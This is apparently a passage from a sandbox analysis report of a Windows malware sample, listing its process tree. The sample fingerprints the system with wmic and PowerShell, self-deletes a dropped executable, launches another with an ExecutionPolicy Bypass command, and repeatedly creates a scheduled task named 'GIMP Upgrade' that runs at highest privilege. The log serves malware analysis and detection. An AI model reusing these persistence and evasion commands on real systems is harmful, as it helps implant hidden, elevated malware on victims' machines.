        Suspicious use of AdjustPrivilegeToken
        
        PID:4168
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2948
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3556
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:4896
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3056
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4576
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\tjktyptw.kq5.exe" && pause
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3336
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5052
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:5068
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3460
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:976
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3516
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\3kjenos5.dav.exe"' & exit
  2⤵
  PID:1448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\3kjenos5.dav.exe"'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4076
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\3kjenos5.dav.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\3kjenos5.dav.exe"
      4⤵
      Executes dropped EXE
      PID:3988
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2204
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2360
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2964
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:940
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2216
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1728
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2616
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:860
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3240
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1788
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2700
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1792
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1036
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2016
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4532
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:724
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3952
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:452
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3172
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:860
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3440
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4020
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4156
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4584
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4576
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2956
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3516
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2380
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2832
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3256
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1728
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3596
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4456
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3172
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3736
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4228
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:208
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1772
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3624
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2604
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4064
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:764
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1640
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:452
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1564
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:556
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:5044
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4868
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4480
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3440
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4024
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4952
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3576
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4564
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4860
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5112
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1148
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3240
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1640
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2216
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2720
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2004
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:5084
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1428
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1328
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4756
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4552
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2260
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:5060
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1996
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3252
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1036
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:5116
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3616
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4964
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3312
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2768
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4888
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:5108
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:696
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2536
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:1208
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4836
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:2824
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3604
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2440
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4100
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3676
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:1328
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3968
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2712
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4552
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3992
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3716
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:880
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1996
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:812
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3488
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:940
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3360
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2464
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4648
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2492
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:4172
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4068
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2176
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:3240
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1656
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2980
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4964
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:2216
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4236
- C:\Windows\SYSTEM32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit
  2⤵
  PID:4940
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST
    3⤵
    PID:3972
